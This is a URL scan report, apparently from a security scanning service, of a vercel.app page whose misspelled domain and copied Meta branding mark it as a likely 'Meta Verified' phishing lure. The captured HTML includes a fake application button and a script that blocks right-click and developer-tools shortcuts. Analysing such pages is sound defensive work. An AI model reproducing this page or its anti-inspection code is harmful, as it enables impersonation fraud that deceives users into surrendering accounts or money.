- 扫描 ID:
- ae79b443-eb0d-4556-868c-5e4c7e9bc80e已完成
- 提交的 URL:
- https://page-verify-for-opprtunity.vercel.app/
- 报告完成时间:
链接 · 找到 0 个
从页面中识别出的传出链接
JavaScript 变量 · 找到 3 个
在页面窗口对象上加载的全局 JavaScript 变量是在函数外部声明的变量,可以从当前范围内的代码中的任何位置访问
名称 | 类型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
控制台日志消息 · 找到 1 条
记录到 Web 控制台的消息
类型 | 类别 | 记录 |
---|---|---|
error | network |
|
HTML
页面的原始 HTML 正文
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Home</title>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet">
<link rel="icon" href="https://pbs.twimg.com/media/GQB99gQaQAEUOZ7?format=png&name=small">
<style>
body {
font-family: system-ui;
margin: 0;
padding: 0;
}
.container-fluid {
background: #F5F6F6;
}
.btn {
background: #0064e0;
border: none;
border-radius: 100px;
padding: 10px 35px;
text-decoration: none;
color: white;
display: inline-block;
margin-top: 1rem;
font-family: Arial, sans-serif;
font-size: 16px;
}
.content {
margin-top: 3rem;
display: flex;
justify-content: center;
}
.content .col-sm-6 {
margin-top: 3rem;
margin-left: 5rem;
}
.content p {
font-size: 18px;
margin-top: 1rem;
font-family: Arial, sans-serif;
}
.sign-up {
font-size: 17px;
padding-top: 1rem;
font-family: Arial, sans-serif;
}
.business-info {
font-size: 14px;
font-family: Arial, sans-serif;
}
.region-info {
font-size: small;
opacity: 95%;
font-family: Arial, sans-serif;
}
.image {
display: none;
width: 42%;
height: 100vh;
background-size: cover;
}
@media (min-width: 576px) {
.image {
display: block;
}
}
</style>
</head>
<body>
<div class="container-fluid">
<img width="120px" src="Meta-Logo.png-2560px-Meta-Logo.png" alt="Meta Logo">
</div>
<div class="content">
<div class="col-sm-6">
<img width="80px" src="verified.png" alt="Meta Verified Icon">
<h1 class="my-3 fs-1">Become <br> Meta Verified</h1>
<div style="margin-bottom: 30px;"></div>
<a href="help.html" class="btn">Apply</a>
<p class="mt-4">Grow your social presence with Meta Verified – a new subscription <br> bundle available for creators and businesses on Instagram and <br> Facebook.</p>
<p class="sign-up">Sign up now for creators</p>
<p class="mt-4 mb-0">
<span class="fw-semibold">Are you a business?</span> Get more information on
</p>
<a href="#" class="business-info">Meta verified for businesses</a> <br><br>
<i class="region-info">Features, availability, and pricing may vary by region.</i>
</div>
<div class="col-sm-5 image" style="background-image: url('https://pbs.twimg.com/media/GPUPRg0a8AACTSj?format=jpg&name=small');"></div>
</div>
<script>
document.addEventListener('contextmenu', function(e) {
e.preventDefault();
});
document.onkeydown = function(e) {
if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
e.preventDefault();
}
};
</script>
</body></html>